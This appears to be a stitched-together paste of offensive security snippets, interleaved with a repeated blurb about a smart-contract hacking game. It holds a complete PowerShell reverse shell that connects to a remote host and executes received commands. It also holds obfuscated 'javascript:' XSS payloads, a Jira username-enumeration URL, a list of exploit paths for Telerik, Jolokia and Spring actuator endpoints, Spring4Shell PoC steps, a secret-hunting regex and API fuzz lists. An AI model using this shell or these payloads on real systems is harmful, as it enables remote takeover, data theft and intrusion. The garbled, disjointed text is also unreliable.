Description of the game
The goal of the game to break as many contracts as possible! Note: one of these contracts is a HONEYPOT! BE CAREFUL!!
Claim your Ropsten test ether here!
The contracts you need to break and their addresses:
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
Description of the game
The goal of the game to break as many contracts as possible! Note: one of these contracts is a HONEYPOT! BE CAREFUL!!
Claim your Ropsten test ether here!
The contracts you need to break and their addresses:
<!--javascript --> | |
ja	vascript:alert(1) | |
ja
vascript:alert(1) | |
ja
vascript:alert(1) | |
javascript:alert() | |
<!--::colon:: --> | |
javascript:alert() | |
javascript:alert() | |
javascript:alert(1) |
cve-2019-8449 | |
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
https://jira.atlassian.com/browse/JRASERVER-69796 | |
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
===================================================================================================================================== |
Exploit/description | Path |
---|---|
Microsoft Office Online Server SSRF (relay) | /op/view.aspx |
CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.Ui.WebResource.axd?type=rau |
CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.UI.DialogHandler.aspx |
CVE-2020-17519 | /jobmanager/logs/ |
CVE-2017-7615 | /verify.php?id=1&confirm_hash= |
CVE-2018-1000130 | /jolokia |
CVE-2018-1000130 | /actuator/jolokia |
leak | /actuator/env |
At this point, it is probably easier to just use something like this: https://github.com/reznok/Spring4Shell-POC | |
- clone https://spring.io/guides/gs/handling-form-submission/ | |
- you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial | |
- modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy) | |
- install tomcat9 + java 11 (i did it on ubuntu 20.04) | |
- deploy the war file | |
- update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT |
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
/plaid/mobile/oauth_callback | |
/callback | |
/oauth2/idpresponse | |
/signin-google | |
/twitter_oauth_signin | |
/soundcloud_oauth_signin | |
/23andme_oauth_signin | |
/500px_oauth_signin | |
/agave_oauth_signin | |
/amazon_oauth_signin |
POST /api/v2/accounts | |
GET /api/v2/activities?since=cstest | |
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest | |
GET /api/v2/automations | |
POST /api/v2/automations | |
GET /api/v2/bookmarks | |
POST /api/v2/bookmarks | |
GET /api/v2/brands | |
POST /api/v2/brands | |
GET /api/v2/custom_objects |